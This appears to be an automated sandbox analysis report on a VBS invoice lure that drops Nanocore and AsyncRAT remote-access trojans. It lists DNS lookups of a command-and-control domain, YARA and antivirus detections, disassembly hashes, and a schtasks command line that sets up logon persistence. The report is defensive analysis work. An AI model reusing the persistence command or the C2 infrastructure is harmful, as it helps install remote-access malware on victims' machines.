                                            May 4, 2021 19:09:49.476988077 CEST192.168.2.68.8.8.80x1f2aStandard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:09:51.483484030 CEST192.168.2.68.8.8.80x1f2aStandard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:09:57.843883038 CEST192.168.2.68.8.8.80xa655Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:10:09.150386095 CEST192.168.2.68.8.8.80x6c53Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:10:32.124850988 CEST192.168.2.68.8.8.80xb54cStandard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:10:38.339664936 CEST192.168.2.68.8.8.80x7013Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:10:44.418627977 CEST192.168.2.68.8.8.80xae48Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:07.055581093 CEST192.168.2.68.8.8.80x8756Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:13.231501102 CEST192.168.2.68.8.8.80x7beStandard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:19.050941944 CEST192.168.2.68.8.8.80xbae2Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:34.072407007 CEST192.168.2.68.8.8.80x2258Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:39.420672894 CEST192.168.2.68.8.8.80xf9f0Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:43.058330059 CEST192.168.2.68.8.8.80x9541Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:44.819533110 CEST192.168.2.68.8.8.80x645dStandard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:51.660826921 CEST192.168.2.68.8.8.80xeab6Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:51.930774927 CEST192.168.2.68.8.8.80x4cd3Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:52.674628973 CEST192.168.2.68.8.8.80xeab6Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)
                                            May 4, 2021 19:11:52.940547943 CEST192.168.2.68.8.8.80x4cd3Standard query (0)sys2021.linkpc.netA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            May 4, 2021 19:09:51.643963099 CEST8.8.8.8192.168.2.60x1f2aNo error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:09:51.927154064 CEST8.8.8.8192.168.2.60x1f2aNo error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:09:52.613918066 CEST8.8.8.8192.168.2.60x1f2aNo error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:09:53.652007103 CEST8.8.8.8192.168.2.60x1f2aNo error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:09:57.901256084 CEST8.8.8.8192.168.2.60xa655No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:10:09.302356005 CEST8.8.8.8192.168.2.60x6c53No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:10:32.284786940 CEST8.8.8.8192.168.2.60xb54cNo error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:10:38.388328075 CEST8.8.8.8192.168.2.60x7013No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:10:44.475996017 CEST8.8.8.8192.168.2.60xae48No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:07.113138914 CEST8.8.8.8192.168.2.60x8756No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:13.282305002 CEST8.8.8.8192.168.2.60x7beNo error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:19.108181953 CEST8.8.8.8192.168.2.60xbae2No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:34.134166002 CEST8.8.8.8192.168.2.60x2258No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:39.478065014 CEST8.8.8.8192.168.2.60xf9f0No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:43.115463972 CEST8.8.8.8192.168.2.60x9541No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:44.879615068 CEST8.8.8.8192.168.2.60x645dNo error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:52.723125935 CEST8.8.8.8192.168.2.60xeab6No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)
                                            May 4, 2021 19:11:52.997445107 CEST8.8.8.8192.168.2.60x4cd3No error (0)sys2021.linkpc.net79.137.109.121A (IP address)IN (0x0001)

                                            Code Manipulations

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: wscript.exe PID: 6428 Parent PID: 3440

                                            General

                                            Start time:19:09:42
                                            Start date:04/05/2021
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs'
                                            Imagebase:0x7ff6f47f0000
                                            File size:163840 bytes
                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: NanoCore, Description: unknown, Source: 00000001.00000003.326100601.0000016C165FC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:high

                                            Chronological Activities

                                            Analysis Process: ame.exe PID: 6592 Parent PID: 6428

                                            General

                                            Start time:19:09:44
                                            Start date:04/05/2021
                                            Path:C:\Users\user\AppData\Local\Temp\ame.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Users\user\AppData\Local\Temp\ame.exe'
                                            Imagebase:0x500000
                                            File size:121856 bytes
                                            MD5 hash:F7F64EC1756119F19D52FB140E22382F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ame.exe, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 62%, Virustotal, Browse
                                            • Detection: 76%, ReversingLabs
                                            Reputation:low

                                            Chronological Activities

                                            Analysis Process: fi.exe PID: 6616 Parent PID: 6428

                                            General

                                            Start time:19:09:44
                                            Start date:04/05/2021
                                            Path:C:\Users\user\AppData\Local\Temp\fi.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\AppData\Local\Temp\fi.exe'
                                            Imagebase:0x40000
                                            File size:207360 bytes
                                            MD5 hash:86A588C5A10A04AF998DBAD9FF9A31D1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.600475304.0000000004A60000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\fi.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 81%, Virustotal, Browse
                                            • Detection: 91%, Metadefender, Browse
                                            • Detection: 100%, ReversingLabs
                                            Reputation:low

                                            Chronological Activities

                                            Analysis Process: dhcpmon.exe PID: 6952 Parent PID: 3440

                                            General

                                            Start time:19:09:56
                                            Start date:04/05/2021
                                            Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                                            Imagebase:0xc40000
                                            File size:207360 bytes
                                            MD5 hash:86A588C5A10A04AF998DBAD9FF9A31D1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
                                            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
                                            • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 81%, Virustotal, Browse
                                            • Detection: 91%, Metadefender, Browse
                                            • Detection: 100%, ReversingLabs
                                            Reputation:low

                                            Chronological Activities

                                            Analysis Process: wscript.exe PID: 6700 Parent PID: 6592

                                            General

                                            Start time:19:11:18
                                            Start date:04/05/2021
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs'
                                            Imagebase:0x7ff6f47f0000
                                            File size:163840 bytes
                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Chronological Activities

                                            Analysis Process: Notepads.exe PID: 5444 Parent PID: 6592

                                            General

                                            Start time:19:11:19
                                            Start date:04/05/2021
                                            Path:C:\Users\user\AppData\Roaming\Notepads.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Users\user\AppData\Roaming\Notepads.exe'
                                            Imagebase:0xee0000
                                            File size:121856 bytes
                                            MD5 hash:F7F64EC1756119F19D52FB140E22382F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Notepads.exe, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 76%, ReversingLabs
                                            Reputation:low

                                            Chronological Activities

                                            Analysis Process: schtasks.exe PID: 5544 Parent PID: 6700

                                            General

                                            Start time:19:11:19
                                            Start date:04/05/2021
                                            Path:C:\Windows\System32\schtasks.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe
                                            Imagebase:0x7ff6992a0000
                                            File size:226816 bytes
                                            MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            Chronological Activities

                                            Analysis Process: conhost.exe PID: 5564 Parent PID: 5544

                                            General

                                            Start time:19:11:20
                                            Start date:04/05/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff61de10000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Chronological Activities

                                            Analysis Process: Notepads.exe PID: 2152 Parent PID: 936

                                            General

                                            Start time:19:11:22
                                            Start date:04/05/2021
                                            Path:C:\Users\user\AppData\Roaming\Notepads.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Users\user\AppData\Roaming\Notepads.exe
                                            Imagebase:0xf40000
                                            File size:121856 bytes
                                            MD5 hash:F7F64EC1756119F19D52FB140E22382F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, Author: Joe Security
                                            Reputation:low

                                            Chronological Activities

                                            Disassembly

                                            Code Analysis

                                            Reset < >

                                              Analysis Process: ame.exe PID: 6592 Parent PID: 6428 ame.exeCOMMON

                                              Executed Functions

                                              Function 00007FFD033202B8, Relevance: 5.3, Strings: 4, Instructions: 323COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: jt)a$jt)a$jt)a$jt)a
                                              • API String ID: 0-2534151892
                                              • Opcode ID: 998b15824d186ccfc2c742e726ad13905e40b1c73ee53c9bad4f64c13ea3b704
                                              • Instruction ID: 3627df32f0df6bf16833a6f17f405f3e353e6a267511bf159f4d77118bfc2c38
                                              • Opcode Fuzzy Hash: 998b15824d186ccfc2c742e726ad13905e40b1c73ee53c9bad4f64c13ea3b704
                                              • Instruction Fuzzy Hash: 7591A132B18D0D8FEB98F76C84A56B9B7E2FF88310F444579D00DE3296DE286C468741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03320BD5, Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: jt)a$jt)a$jt)a$jt)a
                                              • API String ID: 0-2534151892
                                              • Opcode ID: d5f2490481cfb6bd09799427ff038aba3515974dacb25bffb0823d22066603e9
                                              • Instruction ID: d718ab9d7bb0e5bbaadfd9340572efeca1f79076cd248684196100ce0bbb099a
                                              • Opcode Fuzzy Hash: d5f2490481cfb6bd09799427ff038aba3515974dacb25bffb0823d22066603e9
                                              • Instruction Fuzzy Hash: 0C91B232B18D4D4FEB98E76C84A56B8B7E2FF99310F04057AD04DE3297DE28AC468741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03320090, Relevance: 1.5, Strings: 1, Instructions: 278COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: A`_^
                                              • API String ID: 0-4224390668
                                              • Opcode ID: 43c31bebd154d258a9745688c16aefe5555c4110478ec9299522fc16e08bf8fb
                                              • Instruction ID: fd46c1bd24c4f44068b4546a842dca47e0fc5f158103280d15b1218ff1d93cff
                                              • Opcode Fuzzy Hash: 43c31bebd154d258a9745688c16aefe5555c4110478ec9299522fc16e08bf8fb
                                              • Instruction Fuzzy Hash: 51715817B5E5A256EE11F33D74B60E97FA0DF8233671410B7E0CC490A3ED48689E8A95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03320929, Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: jt)a
                                              • API String ID: 0-1490339538
                                              • Opcode ID: 01a768c8f5a6214335a37fc791f6d5e9b4e883f79d3865dc0784c151fd128d6b
                                              • Instruction ID: bb7e42752bb6b3c781ecb1c7b1d4b5e5bafd2044d8cfd4e1073a71974baf9e44
                                              • Opcode Fuzzy Hash: 01a768c8f5a6214335a37fc791f6d5e9b4e883f79d3865dc0784c151fd128d6b
                                              • Instruction Fuzzy Hash: C551E632B1CA4A8FEB48E76884663F9B7E1FF85710F44457AE04ED31D3DE28A8458781
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033206D5, Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: j`
                                              • API String ID: 0-3204994738
                                              • Opcode ID: 7211915b305911d6273707c4e633564408b2b2955bd426abe375df8e72c52832
                                              • Instruction ID: d046beb843f413149051faebec7a5ccba6523217327bbf4723ca57a1903bf114
                                              • Opcode Fuzzy Hash: 7211915b305911d6273707c4e633564408b2b2955bd426abe375df8e72c52832
                                              • Instruction Fuzzy Hash: 74515731B55A1B8FD788F73990E16AE77A2FF883017900475E00DD3686DE3AA855C788
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD0332122D, Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: ]s_H
                                              • API String ID: 0-196105811
                                              • Opcode ID: 6039f2644d699d65f40a145989d9c847d0eab50c681c807a44db457f3eafe84f
                                              • Instruction ID: 9f62a17513c2b80567765d845ffd15469f0b91dca0acb4c0075c884e9b578063
                                              • Opcode Fuzzy Hash: 6039f2644d699d65f40a145989d9c847d0eab50c681c807a44db457f3eafe84f
                                              • Instruction Fuzzy Hash: 0431EA31E59A4A5FDB40FB3498A54FA7BF1FF59300B4145B6E40CE7296CE346A42C741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033212F9, Relevance: .4, Instructions: 394COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5903a43984cfec8d67ad3a39fded1cbeb131fe9089995431896dedda613e5dd7
                                              • Instruction ID: c4c5d6f2cd2ae1a6c762d7e0fe3a3cfb0b7d94dcfec478e3189aecf1a2392ade
                                              • Opcode Fuzzy Hash: 5903a43984cfec8d67ad3a39fded1cbeb131fe9089995431896dedda613e5dd7
                                              • Instruction Fuzzy Hash: DFC16131F28D0A8FEB94FB7884A66BDB6E2EF98701F444079D40ED3297DE286C418741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033202F0, Relevance: .3, Instructions: 319COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db8cef90e4655658cf96c63dd59874ab5078b3a84ef47bef34dbdcc18926fdc2
                                              • Instruction ID: cf2fd2c845226c822eea38bc066929514e5e61f424b9156b89c051f5f9890f73
                                              • Opcode Fuzzy Hash: db8cef90e4655658cf96c63dd59874ab5078b3a84ef47bef34dbdcc18926fdc2
                                              • Instruction Fuzzy Hash: EA41FF21B9AA5B8FD744F73A50E15EA7FA1EFC831178000B3E04DD3387DC2869198759
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03321361, Relevance: .3, Instructions: 305COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 27f047b070567870867a42821d256438f24eaa81ffa72994ed6e0895706e76b4
                                              • Instruction ID: 49d4f7ca1e0193d15545902f63d84adfddb90ddc051978e6590d84c7f35aed5e
                                              • Opcode Fuzzy Hash: 27f047b070567870867a42821d256438f24eaa81ffa72994ed6e0895706e76b4
                                              • Instruction Fuzzy Hash: 6BA12E31F19D1A8FEB98FB7884A56BD76E2FF98701F540079E40ED3297DE2868428741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033200D0, Relevance: .2, Instructions: 248COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.556286357.00007FFD03320000.00000040.00000001.sdmp, Offset: 00007FFD03320000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bfab34f2e0204e72ef6e1eb8bfb6eb5bbb1748f19e7151ad75a50dadbb55591b
                                              • Instruction ID: 7970d6fc2c033c2bb4f52158dd8e77145599cbf8ab2dc14ec7c65286950d286d
                                              • Opcode Fuzzy Hash: bfab34f2e0204e72ef6e1eb8bfb6eb5bbb1748f19e7151ad75a50dadbb55591b
